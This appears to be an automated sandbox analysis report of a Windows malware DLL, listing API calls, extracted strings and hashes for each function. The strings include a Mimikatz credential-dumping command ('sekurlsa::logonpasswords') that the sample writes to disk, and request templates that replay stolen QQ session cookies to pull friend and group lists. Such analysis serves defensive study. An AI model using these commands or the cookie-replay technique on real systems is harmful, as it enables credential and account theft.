                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc$Eventfreemalloc
                                                  • String ID: .$0$2$3$A$A$C$D$G$K$L$N$P$P$R$S$T$W$\$a$a$a$c$d$f$h$i$l$l$l$m$n$o$p$t$t$t$t$t$u
                                                  • API String ID: 4197004350-898277365
                                                  • Opcode ID: e985835fed67615f6df0a7680aadc73079c05cb754b57abcd28cffc8d42705bc
                                                  • Instruction ID: e4e1a8f70a62ed0fb3f70fb2bb34216420262f45e8a5f1963d3a2823f94517be
                                                  • Opcode Fuzzy Hash: e985835fed67615f6df0a7680aadc73079c05cb754b57abcd28cffc8d42705bc
                                                  • Instruction Fuzzy Hash: A4615A6110C3C09DE312D7A89848B8BBFD59BE6308F08499DF5C84B292D2BA921CC777
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32 ref: 10021B6B
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10021B78
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,TerminateThread), ref: 10021B8C
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10021B8F
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,?), ref: 10021BDB
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10021BDE
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,esolC), ref: 10021C52
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10021C55
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,TerminateProcess), ref: 10021C65
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10021C68
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,DisconnectNamedPipe), ref: 10021C78
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10021C7B
                                                  • Sleep.KERNEL32(0000000A), ref: 10021C92
                                                  • GetConsoleProcessList.KERNEL32(?,00000001), ref: 10021CB2
                                                  • #823.MFC42 ref: 10021CC3
                                                  • GetConsoleProcessList.KERNEL32(00000000,00000000), ref: 10021CD3
                                                  • GetCurrentProcessId.KERNEL32 ref: 10021CE7
                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 10021CFE
                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 10021D09
                                                  • CloseHandle.KERNEL32(00000000), ref: 10021D10
                                                  • #825.MFC42(00000000), ref: 10021D29
                                                  • FreeConsole.KERNEL32 ref: 10021D3B
                                                  • Sleep.KERNEL32(0000000A), ref: 10021D43
                                                  • FreeConsole.KERNEL32 ref: 10021D49
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$LibraryLoadProcess$Console$FreeHandleListSleep$#823#825CloseCurrentModuleOpenTerminate
                                                  • String ID: AttachConsole$C$DisconnectNamedPipe$F$KERNEL32.dll$S$TerminateProcess$TerminateThread$W$a$c$e$e$elgn$esolC$g$l$l$l$n$o$o$r$s
                                                  • API String ID: 708691324-3966567685
                                                  • Opcode ID: 741715f5c22d509939c9bc528903dab9d2a512ea46f4c08bb4bf823d40ea4759
                                                  • Instruction ID: c933f3f563454645004e4f6d5f6eb1a79af4ddca9388bdfc54bceab6f739e533
                                                  • Opcode Fuzzy Hash: 741715f5c22d509939c9bc528903dab9d2a512ea46f4c08bb4bf823d40ea4759
                                                  • Instruction Fuzzy Hash: 6BB1B0746083949BDB20DB68CC84BDFBBE9AF95740F45481DF9889B241C7B5E904CBA2
                                                  APIs
                                                  • strstr.MSVCRT ref: 10013514
                                                  • strstr.MSVCRT ref: 10013527
                                                  • strstr.MSVCRT ref: 1001353C
                                                  • strncpy.MSVCRT ref: 10013588
                                                  • _itoa.MSVCRT ref: 100135CE
                                                  • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 100135E7
                                                  • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000000), ref: 1001360D
                                                  • InternetCloseHandle.WININET(00000000), ref: 1001361A
                                                  • HttpOpenRequestA.WININET(00000000,POST,?,HTTP/1.1,00000000,00000000,80084010,00000000), ref: 1001364A
                                                  • InternetCloseHandle.WININET(00000000), ref: 1001365D
                                                  • InternetCloseHandle.WININET(00000000), ref: 10013660
                                                  • sprintf.MSVCRT ref: 1001368B
                                                  • HttpSendRequestA.WININET(00000000,?,?,?), ref: 100136C3
                                                  • HttpQueryInfoA.WININET(00000000,00000005,?,?,00000000), ref: 100136DF
                                                  • InternetCloseHandle.WININET(00000000), ref: 100136F0
                                                  • InternetCloseHandle.WININET(00000000), ref: 100136F3
                                                  • InternetCloseHandle.WININET(00000000), ref: 100136F6
                                                  • atol.MSVCRT ref: 1001370F
                                                  • #823.MFC42(00000001,?,?), ref: 1001371D
                                                  • InternetReadFile.WININET(00000000,00000000,00000001,?), ref: 10013745
                                                  • #825.MFC42(00000000), ref: 10013750
                                                  • InternetCloseHandle.WININET(00000000), ref: 1001375F
                                                  • InternetCloseHandle.WININET(00000000), ref: 10013762
                                                  • InternetCloseHandle.WININET(?), ref: 10013769
                                                  • InternetCloseHandle.WININET(00000000), ref: 10013781
                                                  • InternetCloseHandle.WININET(00000000), ref: 10013784
                                                  • InternetCloseHandle.WININET(?), ref: 1001378B
                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 1001379B
                                                  • #823.MFC42(00000002), ref: 100137A8
                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 100137D2
                                                  • #825.MFC42(00000000), ref: 100137D9
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 100137F0
                                                  • #823.MFC42(00000001), ref: 100137FC
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 10013827
                                                  • #825.MFC42(00000000), ref: 1001382E
                                                  • #825.MFC42(00000000,00000000,00000000), ref: 1001383C
                                                  Strings
                                                  • qun.qq.com, xrefs: 100134BB
                                                  • , xrefs: 10013503
                                                  • bkn=, xrefs: 1001354D
                                                  • Accept: */*Referer: http://qun.qq.com%sAccept-Language: zh-cnContent-Type: application/x-www-form-urlencodedCookie: %s, xrefs: 10013685
                                                  • p_skey, xrefs: 100134FD
                                                  • skey=, xrefs: 10013521
                                                  • /cgi-bin/qun_mgr/get_friend_list, xrefs: 100134DB
                                                  • POST, xrefs: 10013644
                                                  • Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1), xrefs: 100134AF
                                                  • HTTP/1.1, xrefs: 1001363E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$CloseHandle$#825ByteCharMultiWide$#823Httpstrstr$OpenRequest$ConnectFileInfoQueryReadSend_itoaatolsprintfstrncpy
                                                  • String ID: $/cgi-bin/qun_mgr/get_friend_list$Accept: */*Referer: http://qun.qq.com%sAccept-Language: zh-cnContent-Type: application/x-www-form-urlencodedCookie: %s$HTTP/1.1$Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)$POST$bkn=$p_skey$qun.qq.com$skey=
                                                  • API String ID: 3684279964-1003693118
                                                  • Opcode ID: 83a2f2817c2aedd7fbe9857ede55100449b32c6472bc6b786a787f71fcc3d649
                                                  • Instruction ID: a6aeb5833008578cdead13e838f5760d2c554c937ea3091131f56ecc18512e5b
                                                  • Opcode Fuzzy Hash: 83a2f2817c2aedd7fbe9857ede55100449b32c6472bc6b786a787f71fcc3d649
                                                  • Instruction Fuzzy Hash: 4FA137726003146BE314DA788C41FAB7BDDFBC4320F044629FA59E72C0DEB4A9058B95
                                                  APIs
                                                    • Part of subcall function 1001B660: GetModuleHandleA.KERNEL32(?,755683C0,1001F1D6), ref: 1001B666
                                                    • Part of subcall function 1001B660: LoadLibraryA.KERNEL32(?), ref: 1001B671
                                                    • Part of subcall function 1001B660: GetProcAddress.KERNEL32(00000000,?), ref: 1001B681
                                                  • DeleteFileA.KERNEL32(00000001,?,00000001,00000001,?,00000001,00000001,00000001), ref: 1000874C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressDeleteFileHandleLibraryLoadModuleProc
                                                  • String ID: .$2$3$4$4$6$6$E$E$F$K$L$N$R$R$R$R$W$W$a$c$d$d$i$i$i$l$l$n$n$o$o$o$open$r$r$r$s$t$t$v$w$w
                                                  • API String ID: 357481036-173339048
                                                  • Opcode ID: b35eb0abf191cff89a94c78c48ed883a63f7157c3257380d681e420933c49f90
                                                  • Instruction ID: b2534d6be5788ef259c749724872d3f87395c9b78c17d96c33da540c7ee2e7e0
                                                  • Opcode Fuzzy Hash: b35eb0abf191cff89a94c78c48ed883a63f7157c3257380d681e420933c49f90
                                                  • Instruction Fuzzy Hash: 5B91291010C3C0D9E356C668848871FBED6ABA668CF48598DB1C95B287C6BF961CC77B
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(KERNEL32.dll,AttachConsole), ref: 10022086
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10022093
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,WriteFile), ref: 100220A1
                                                  • GetProcAddress.KERNEL32(00000000), ref: 100220A8
                                                  • Sleep.KERNEL32(0000000A), ref: 100220F7
                                                  • GetConsoleProcessList.KERNEL32(?,00000001), ref: 10022117
                                                  • #823.MFC42 ref: 1002212C
                                                  • GetConsoleProcessList.KERNEL32(00000000,00000000), ref: 1002213C
                                                  • GetCurrentProcessId.KERNEL32 ref: 1002215C
                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 10022173
                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 10022182
                                                  • CloseHandle.KERNEL32(00000000), ref: 10022185
                                                  • #825.MFC42(00000000), ref: 100221B0
                                                  • FreeConsole.KERNEL32 ref: 100221BE
                                                  • Sleep.KERNEL32(0000000A), ref: 100221C6
                                                  • FreeConsole.KERNEL32 ref: 100221CC
                                                    • Part of subcall function 10010BA0: SetEvent.KERNEL32(?,10017547), ref: 10010BA4
                                                  • GetSystemDirectoryA.KERNEL32(00000000,00000104), ref: 1002233F
                                                  • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 10022383
                                                  • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 100223A7
                                                  • CloseHandle.KERNEL32(00000000), ref: 100223B2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$Console$Handle$AddressCloseFileFreeListProcSleep$#823#825CreateCurrentDirectoryEventLibraryLoadModuleOpenSystemTerminateWrite
                                                  • String ID: AttachConsole$Control-C^C$GetMP privilege::debug sekurlsa::logonpasswords exit$KERNEL32.dll$WriteFile$\GetMP.exe
                                                  • API String ID: 1461520672-3309419308
                                                  • Opcode ID: 6310b5d375ddeb1e15972f7a9968cdf70d34c61dddc8e7a1745c458d66823d98
                                                  • Instruction ID: 745433b2e33f40d27a107189e57a56e7013cf6ba6b9ad028cc8163822ca25403
                                                  • Opcode Fuzzy Hash: 6310b5d375ddeb1e15972f7a9968cdf70d34c61dddc8e7a1745c458d66823d98
                                                  • Instruction Fuzzy Hash: 05A12675600315ABE710EB64DC81FDB77D4FB84390F450A29FE49AB280DA35EC49CBA2
                                                  APIs
                                                  • InternetOpenA.WININET ref: 100138CF
                                                  • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000000), ref: 100138F5
                                                  • InternetCloseHandle.WININET(00000000), ref: 10013902
                                                  • HttpOpenRequestA.WININET(00000000,POST,?,HTTP/1.1,00000000,00000000,80084010,00000000), ref: 10013932
                                                  • InternetCloseHandle.WININET(00000000), ref: 10013945
                                                  • InternetCloseHandle.WININET(00000000), ref: 10013948
                                                  Strings
                                                  • qun.qq.com, xrefs: 10013878
                                                  • /cgi-bin/qun_mgr/search_group_members, xrefs: 10013898
                                                  • , xrefs: 100138BC
                                                  • Accept: */*Referer: http://qun.qq.com%sAccept-Language: zh-cnContent-Type: application/x-www-form-urlencodedCookie: %s, xrefs: 1001396D
                                                  • POST, xrefs: 1001392C
                                                  • Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1), xrefs: 1001386F
                                                  • HTTP/1.1, xrefs: 10013926
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$CloseHandle$Open$ConnectHttpRequest
                                                  • String ID: $/cgi-bin/qun_mgr/search_group_members$Accept: */*Referer: http://qun.qq.com%sAccept-Language: zh-cnContent-Type: application/x-www-form-urlencodedCookie: %s$HTTP/1.1$Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)$POST$qun.qq.com
                                                  • API String ID: 3078302290-2376693140
                                                  • Opcode ID: 492e52c6053871d090237183561d3215cecf92edc6964bc9b14581eaf8abf60b
                                                  • Instruction ID: ea8ef1183b0b68027489ada680c689866708b7ee025198ed557c1e0327d219cf
                                                  • Opcode Fuzzy Hash: 492e52c6053871d090237183561d3215cecf92edc6964bc9b14581eaf8abf60b
                                                  • Instruction Fuzzy Hash: 197119366447147BF310EB689C45FAB77DDFB84720F184629F749A72C0DAB4A9048BA2
                                                  APIs
                                                  • LoadLibraryA.KERNEL32 ref: 1002C1EF
                                                  • GetProcAddress.KERNEL32(00000000), ref: 1002C1F8
                                                  • LoadLibraryA.KERNEL32(wininet.dll,InternetCloseHandle), ref: 1002C226
                                                  • GetProcAddress.KERNEL32(00000000), ref: 1002C229
                                                  • LoadLibraryA.KERNEL32(wininet.dll,InternetOpenUrlA), ref: 1002C239
                                                  • GetProcAddress.KERNEL32(00000000), ref: 1002C23C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: $($)$.$/$0$4$CreateFileA$InternetCloseHandle$InternetOpenA$InternetOpenUrlA$InternetReadFile$KERNEL32.dll$M$WININET.dll$b$c$e$m$o$o$p$t$wininet.dll$z
                                                  • API String ID: 2574300362-3884860928
                                                  • Opcode ID: 2c8e0b5f39f58fa8b784c09551921f0494a88c72919cc9d60d4391f1f8b674ac
                                                  • Instruction ID: 372516e92528e6efe9f22b4c5a5c646a96e954f55364d348ea2945ce99da904a
                                                  • Opcode Fuzzy Hash: 2c8e0b5f39f58fa8b784c09551921f0494a88c72919cc9d60d4391f1f8b674ac
                                                  • Instruction Fuzzy Hash: 2551817110C3C4AEE311DBA89C84B9FBFD99BD5248F944A1DF28867242C679D6088767
                                                  APIs
                                                    • Part of subcall function 1001B660: GetModuleHandleA.KERNEL32(?,755683C0,1001F1D6), ref: 1001B666
                                                    • Part of subcall function 1001B660: LoadLibraryA.KERNEL32(?), ref: 1001B671
                                                    • Part of subcall function 1001B660: GetProcAddress.KERNEL32(00000000,?), ref: 1001B681
                                                  • GetVersionExA.KERNEL32(?), ref: 1001DF7B
                                                    • Part of subcall function 1001AC50: LoadLibraryW.KERNEL32(ntdll.dll,?,00000000,1001B2AF,?,?,?), ref: 1001AC59
                                                    • Part of subcall function 1001AC50: GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 1001AC6B
                                                    • Part of subcall function 1001AC50: FreeLibrary.KERNEL32(00000000), ref: 1001AC95
                                                  • ExitProcess.KERNEL32 ref: 1001E015
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Library$AddressLoadProc$ExitFreeHandleModuleProcessVersion
                                                  • String ID: .$.$2$2$3$3$D$I$L$P$S$S$S$S$V$a$c$d$d$e$e$e$e$e$i$l$l$l$l$n$r$s$u$v$v
                                                  • API String ID: 1234256494-3470857448
                                                  • Opcode ID: a7b4af1af0eac9efd19d3b616aa3e6d89de6f990af98c94fa3adef2c9044e506
                                                  • Instruction ID: f4702430a3c5328c5ff3dd9a0e4adc3db862c49a5761f8788f093bcad00a8dc9
                                                  • Opcode Fuzzy Hash: a7b4af1af0eac9efd19d3b616aa3e6d89de6f990af98c94fa3adef2c9044e506
                                                  • Instruction Fuzzy Hash: 59512C2140C3C0DDE312D7688898B5FBFE55BA6748F48499EF1C94A282C2BAC65CC777
                                                  APIs
                                                  • AttachConsole.KERNEL32(?), ref: 1000FEF3
                                                  • Sleep.KERNEL32(0000000A), ref: 1000FEFB
                                                  • AttachConsole.KERNEL32(?), ref: 1000FF05
                                                  • GetConsoleProcessList.KERNEL32(?,00000001), ref: 1000FF18
                                                  • #823.MFC42(00000000), ref: 1000FF29
                                                  • GetConsoleProcessList.KERNEL32(00000000,00000000), ref: 1000FF39
                                                  • GetCurrentProcessId.KERNEL32 ref: 1000FF43
                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 1000FF57
                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 1000FF66
                                                  • CloseHandle.KERNEL32(00000000), ref: 1000FF6D
                                                  • #825.MFC42(00000000), ref: 1000FF7E
                                                  • FreeConsole.KERNEL32 ref: 1000FF8C
                                                  • Sleep.KERNEL32(0000000A), ref: 1000FF94
                                                  • FreeConsole.KERNEL32 ref: 1000FF9A
                                                  • TerminateProcess.KERNEL32(?,00000000), ref: 1000FFA6
                                                  • CloseHandle.KERNEL32(?), ref: 10010006
                                                  • CloseHandle.KERNEL32(?), ref: 1001000E
                                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,00020000), ref: 1001002F
                                                  • OpenServiceA.ADVAPI32(00000000,1011EC82,00000010), ref: 10010043
                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 10010050
                                                  • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 10010066
                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 10010077
                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 1001007A
                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 10010087
                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 1001008A
                                                  • GetCommandLineA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 100100C8
                                                  • CreateProcessA.KERNEL32(00000000,00000000), ref: 100100D1
                                                  • CloseHandle.KERNEL32(?), ref: 100100E4
                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000400), ref: 100100FB
                                                  • CreateProcessA.KERNEL32 ref: 1001016C
                                                  • CloseHandle.KERNEL32(?), ref: 1001017F
                                                  • CloseHandle.KERNEL32(?), ref: 10010186
                                                  • ExitProcess.KERNEL32 ref: 1001018A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseHandle$Process$Service$Console$Open$AttachCreateFreeListSleepTerminate$#823#825CommandCurrentExitFileLineManagerModuleNameStart
                                                  • String ID: -inst$D$D
                                                  • API String ID: 2444995177-2453324352
                                                  • Opcode ID: 5c0f68580dd309453bc8097f2966c259f4ab4ec395cbcbb89f8d73f666c2bb2e
                                                  • Instruction ID: 81ebdc164915bba45ce875e3ab3855c87f442e81fe63613658d6256ab5c1e20f
                                                  • Opcode Fuzzy Hash: 5c0f68580dd309453bc8097f2966c259f4ab4ec395cbcbb89f8d73f666c2bb2e
                                                  • Instruction Fuzzy Hash: E081D231600316ABE700DB64CC80B7B77E9FF88790F054A2DFA4997694DB74EC008BA5
                                                  APIs
                                                  • #535.MFC42(00000030,00000002,00000000,?,00000000), ref: 10011B2F
                                                  • #540.MFC42 ref: 10011B40
                                                  • #540.MFC42 ref: 10011B4E
                                                  • #6282.MFC42 ref: 10011B69
                                                  • #6283.MFC42 ref: 10011B72
                                                  • #941.MFC42(100FA644), ref: 10011B80
